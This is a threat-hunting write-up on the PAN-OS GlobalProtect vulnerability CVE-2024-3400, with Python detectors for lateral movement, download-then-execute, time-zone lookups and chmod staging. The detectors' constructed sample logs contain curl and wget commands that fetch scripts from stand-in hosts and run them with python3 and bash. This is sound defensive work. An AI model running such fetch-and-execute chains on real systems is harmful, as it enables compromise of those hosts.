Threat Overview - CVE-2024-3400 - Palo Alto OS Command Injection Vulnerability
CVE-2024-3400 is an OS command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS that permits unauthenticated remote code execution. It was identified by Volexity threat researchers in April 2024 and affects PAN-OS 10.2, 11.0 and 11.1 firewalls with a GlobalProtect gateway or portal configured; Palo Alto Networks shipped fixes in 10.2.9-h1, 11.0.4-h1, 11.1.2-h3 and later hotfixes. The flaw is rated critical (CVSS 10.0) and has been exploited in the wild since at least March 26, 2024; Palo Alto Networks' Unit 42 tracks the activity as Operation MidnightEclipse. Successful exploitation lets an attacker run arbitrary commands with root privileges on the firewall. Observed post-exploitation activity includes establishing a reverse shell, downloading additional tooling onto the device, and using the compromised firewall as a beachhead for lateral movement into the internal network. The hunt packages below target that post-exploitation activity rather than the exploit request itself, so they remain useful against follow-on tradecraft even after the device has been patched.
Hunt Packages
CURL/WGET Download and Execute - Potential Payload Download Followed by Execution
This hunt package identifies the use of curl or wget followed by execution of the downloaded payload through a scripting interpreter such as bash, python or perl. This is the pattern to expect behind the tool downloads described above, so the download and the subsequent execution should be correlated on the same host within a short window rather than alerted on separately.
Remote Interactive Connections from Unexpected Locations
This hunt package identifies remote interactive connections that originate from unexpected, internet-exposed locations and terminate in more isolated internal segments, which can indicate that an external asset (such as an edge firewall) has been compromised and is being used as a beachhead for lateral movement. By focusing on remote connection protocols such as SSH, WinRM, RDP and SMB, the package is designed to surface unauthorized access where attackers leverage these protocols to move laterally across the network.
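The following is an added example of the logic this hunt describes, written for this page and not part of the HUNTER platform's own content. It scores SSH, RDP, WinRM and SMB sessions by comparing the source and destination against a zone map and a jump-host allowlist; the address ranges, zone names, the allowlisted bastion and the connection log format are all assumptions standing in for a real asset inventory and a real flow or firewall log.

```python
"""Flag remote interactive sessions initiated by internet-exposed hosts toward
isolated internal segments (added example; zones and hosts are hypothetical)."""
import ipaddress
from collections import defaultdict

# Assumed zoning: exposed assets (DMZ, edge appliances) should rarely open
# interactive sessions into internal segments.
EXPOSED_ZONES = {
    "dmz": ipaddress.ip_network("10.10.0.0/24"),
    "edge_appliances": ipaddress.ip_network("10.10.1.0/24"),  # firewalls, VPN gateways
}
INTERNAL_ZONES = {
    "server_lan": ipaddress.ip_network("10.20.0.0/16"),
    "admin_vlan": ipaddress.ip_network("10.30.0.0/24"),
}
# Remote interactive protocols named in the hunt package, keyed by destination port.
INTERACTIVE_PORTS = {22: "SSH", 3389: "RDP", 5985: "WinRM", 5986: "WinRM", 445: "SMB"}
# Exposed hosts that are expected to initiate such sessions (hypothetical bastion).
ALLOWED_SOURCES = {"10.10.0.2"}

# Constructed sample, not real traffic. Columns: ts src dst dport proto
CONSTRUCTED_CONN_LOG = """\
# ts src dst dport proto
2024-04-12T03:14:07Z 10.10.1.20 10.20.5.10 22 tcp
2024-04-12T03:15:22Z 10.10.1.20 10.20.5.11 3389 tcp
2024-04-12T03:16:01Z 10.10.0.2 10.20.5.10 22 tcp
2024-04-12T03:17:45Z 10.20.5.10 10.20.5.12 445 tcp
2024-04-12T03:18:10Z 10.10.0.7 10.20.9.4 5985 tcp
2024-04-12T03:19:00Z 10.10.1.20 10.20.5.10 443 tcp
2024-04-12T03:19:30Z 10.10.1.20 10.20.5.13 53 udp
"""


def parse_conn_log(text):
    """Parse the constructed whitespace-separated format into dicts."""
    conns = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, dst, dport, proto = line.split()
        conns.append({"ts": ts, "src": src, "dst": dst, "dport": int(dport), "proto": proto})
    return conns


def zone_of(ip, zones):
    """Name of the first zone containing ip, or None."""
    addr = ipaddress.ip_address(ip)
    return next((name for name, net in zones.items() if addr in net), None)


def flag_beachhead_connections(conns):
    """Interactive TCP sessions from an exposed zone into an internal zone,
    excluding allowlisted sources such as a sanctioned bastion."""
    hits = []
    for c in conns:
        if c["proto"] != "tcp" or c["dport"] not in INTERACTIVE_PORTS:
            continue
        src_zone = zone_of(c["src"], EXPOSED_ZONES)
        dst_zone = zone_of(c["dst"], INTERNAL_ZONES)
        if src_zone is None or dst_zone is None or c["src"] in ALLOWED_SOURCES:
            continue
        hits.append({**c, "protocol": INTERACTIVE_PORTS[c["dport"]],
                     "src_zone": src_zone, "dst_zone": dst_zone})
    return hits


def fan_out(hits):
    """Distinct internal targets per exposed source: an edge appliance reaching
    several internal hosts is the stronger lead for triage."""
    targets = defaultdict(set)
    for h in hits:
        targets[h["src"]].add(h["dst"])
    return {src: sorted(d) for src, d in targets.items()}


if __name__ == "__main__":
    found = flag_beachhead_connections(parse_conn_log(CONSTRUCTED_CONN_LOG))
    for h in found:
        print(h["ts"], h["protocol"], h["src"], "->", h["dst"], f"({h['src_zone']} -> {h['dst_zone']})")
    print(fan_out(found))
```

In the constructed sample the bastion's SSH session and the internal-to-internal SMB session are suppressed, while the edge appliance at 10.10.1.20 is reported once for SSH and once for RDP; `fan_out` then shows it reaching two distinct internal hosts, which is the triage signal a hunter wants ahead of a single connection.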
CURL/WGET Activity Associated with Time Zone Lookups
This hunt package identifies the use of command-line tools such as curl and wget to query time-zone services. Adversaries use these ubiquitous utilities to learn a target's physical location (country, city and sometimes a more precise locale) without introducing new tooling onto the host. The package focuses on unusual or suspicious invocations that indicate a request to a time-zone lookup service.
Usage of chmod to Enable Execution - Potential Payload Staging
This hunt package identifies instances where the 'chmod' command is used to modify file permissions, specifically changes that grant execute permission. By correlating these events with the user context and the file path (world-writable staging locations such as /tmp, /var/tmp and /dev/shm deserve particular attention), the package highlights potentially malicious activity such as preparing a downloaded payload for execution or setting up a persistence mechanism by an unauthorized user.
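The three host-based hunts above (curl/wget download followed by execution, curl/wget time-zone lookups, and chmod granting execute) share the same input, so the following added example implements all three over one constructed set of process-execution events. It is written for this page and is not the HUNTER platform's own content; the JSON event schema, the hostnames, the IP addresses and URLs (documentation and example ranges), the 10-minute correlation window, the interpreter list and the time-zone URL patterns are all assumptions to be tuned against real telemetry.

```python
"""Three process-telemetry hunts over constructed events (added example)."""
import json
import re
import shlex
from datetime import datetime, timedelta
from pathlib import PurePosixPath
from urllib.parse import urlparse

DOWNLOADERS = {"curl", "wget"}
INTERPRETERS = {"bash", "sh", "dash", "zsh", "python", "python2", "python3", "perl", "ruby", "php"}
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")  # world-writable payload drop locations
# Assumed patterns for public time-zone lookup services; tune to your telemetry.
TZ_URL_PATTERN = re.compile(r"worldtime|timeapi|timezone|/tz(?:/|$)", re.I)

# Constructed JSON-lines process events (schema and hosts are hypothetical).
CONSTRUCTED_PROCESS_LOG = """\
{"ts": "2024-04-12T03:20:01Z", "host": "fw-edge-01", "user": "root", "cmdline": "curl -s -o /tmp/update.py http://203.0.113.5/update.py"}
{"ts": "2024-04-12T03:20:03Z", "host": "fw-edge-01", "user": "root", "cmdline": "chmod +x /tmp/update.py"}
{"ts": "2024-04-12T03:20:05Z", "host": "fw-edge-01", "user": "root", "cmdline": "python3 /tmp/update.py"}
{"ts": "2024-04-12T03:21:10Z", "host": "fw-edge-01", "user": "root", "cmdline": "curl -s http://time.example.net/api/timezone/ip"}
{"ts": "2024-04-12T03:22:40Z", "host": "app-srv-03", "user": "www-data", "cmdline": "wget -q https://198.51.100.9/agent.sh -O /var/tmp/.a.sh"}
{"ts": "2024-04-12T03:22:41Z", "host": "app-srv-03", "user": "www-data", "cmdline": "chmod 0755 /var/tmp/.a.sh"}
{"ts": "2024-04-12T03:22:45Z", "host": "app-srv-03", "user": "www-data", "cmdline": "bash /var/tmp/.a.sh"}
{"ts": "2024-04-12T03:30:00Z", "host": "build-01", "user": "jenkins", "cmdline": "chmod 644 /var/lib/jenkins/config.xml"}
{"ts": "2024-04-12T03:31:00Z", "host": "build-01", "user": "jenkins", "cmdline": "curl -s https://pkgs.example.org/release/notes.txt"}
"""


def parse_events(text):
    """Parse events, tokenise the command line and sort by time."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ev = json.loads(line)
            ev["ts"] = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00"))
            ev["argv"] = shlex.split(ev["cmdline"])
            ev["exe"] = PurePosixPath(ev["argv"][0]).name if ev["argv"] else ""
            events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def download_target(argv):
    """Local path a curl/wget command writes to, or None when output goes to stdout.
    Combined short flags such as -sO are not parsed (simplifying assumption)."""
    exe = PurePosixPath(argv[0]).name
    url = next((a for a in argv[1:] if a.startswith(("http://", "https://", "ftp://"))), None)
    basename = PurePosixPath(urlparse(url).path).name if url else None
    args = argv[1:]
    for i, a in enumerate(args):
        nxt = args[i + 1] if i + 1 < len(args) else None
        if exe == "curl" and a in ("-o", "--output") and nxt:
            return nxt
        if exe == "curl" and a in ("-O", "--remote-name"):
            return basename
        if exe == "wget" and a in ("-O", "--output-document") and nxt:
            return None if nxt == "-" else nxt  # "wget -O -" streams to stdout
    return basename if exe == "wget" else None  # wget defaults to the URL basename


def download_then_execute(events, window=timedelta(minutes=10)):
    """A download that writes a file, followed on the same host within `window`
    by an interpreter running that file or by the file being executed directly."""
    hits = []
    for i, ev in enumerate(events):
        target = download_target(ev["argv"]) if ev["exe"] in DOWNLOADERS else None
        if not target:
            continue
        tname = PurePosixPath(target).name
        for later in events[i + 1:]:
            if later["ts"] - ev["ts"] > window:
                break  # events are time-ordered
            if later["host"] != ev["host"] or not later["argv"]:
                continue
            # Basename matching is deliberately loose; generic names (setup.py,
            # install.sh) will need tuning in production.
            via_interpreter = later["exe"] in INTERPRETERS and any(
                PurePosixPath(a).name == tname for a in later["argv"][1:])
            if via_interpreter or later["exe"] == tname:
                hits.append({"host": ev["host"], "user": later["user"], "path": target,
                             "download": ev["cmdline"], "execution": later["cmdline"],
                             "delay_s": (later["ts"] - ev["ts"]).total_seconds()})
                break
    return hits


def timezone_lookups(events):
    """curl/wget requests whose URL looks like a time-zone service."""
    return [{"ts": ev["ts"].isoformat(), "host": ev["host"], "user": ev["user"], "url": a}
            for ev in events if ev["exe"] in DOWNLOADERS
            for a in ev["argv"][1:] if a.startswith(("http://", "https://")) and TZ_URL_PATTERN.search(a)]


def grants_exec(mode):
    """True if a chmod mode adds an execute bit (octal with any x bit, or a symbolic clause setting x/X)."""
    if re.fullmatch(r"[0-7]{3,4}", mode):
        return int(mode, 8) & 0o111 != 0
    return any(re.fullmatch(r"[ugoa]*[+=][rwxXst]*[xX][rwxXst]*", c) for c in mode.split(","))


def chmod_exec_grants(events):
    """chmod invocations that grant execute, with whether the path sits in a staging directory."""
    hits = []
    for ev in events:
        operands = [a for a in ev["argv"][1:] if not a.startswith("-")]  # drop -R, -v and the like
        if ev["exe"] != "chmod" or len(operands) < 2 or not grants_exec(operands[0]):
            continue
        for path in operands[1:]:
            hits.append({"ts": ev["ts"].isoformat(), "host": ev["host"], "user": ev["user"],
                         "mode": operands[0], "path": path, "staging_dir": path.startswith(STAGING_DIRS)})
    return hits


if __name__ == "__main__":
    evs = parse_events(CONSTRUCTED_PROCESS_LOG)
    for name, fn in (("download+execute", download_then_execute), ("tz-lookup", timezone_lookups), ("chmod+x", chmod_exec_grants)):
        for hit in fn(evs):
            print(name, json.dumps(hit))
```

Against the constructed events, the download-then-execute hunt reports the two download/interpreter pairs (the curl `-o` followed by python3 on fw-edge-01 and the wget `-O` followed by bash on app-srv-03) but not the curl calls that only wrote to stdout; the time-zone hunt reports the single lookup from the firewall; and the chmod hunt reports both execute grants in staging directories while ignoring the `644` change on the build server. The delay between download and execution and the staging-directory flag are carried in the results because they are what an analyst uses to rank the hits.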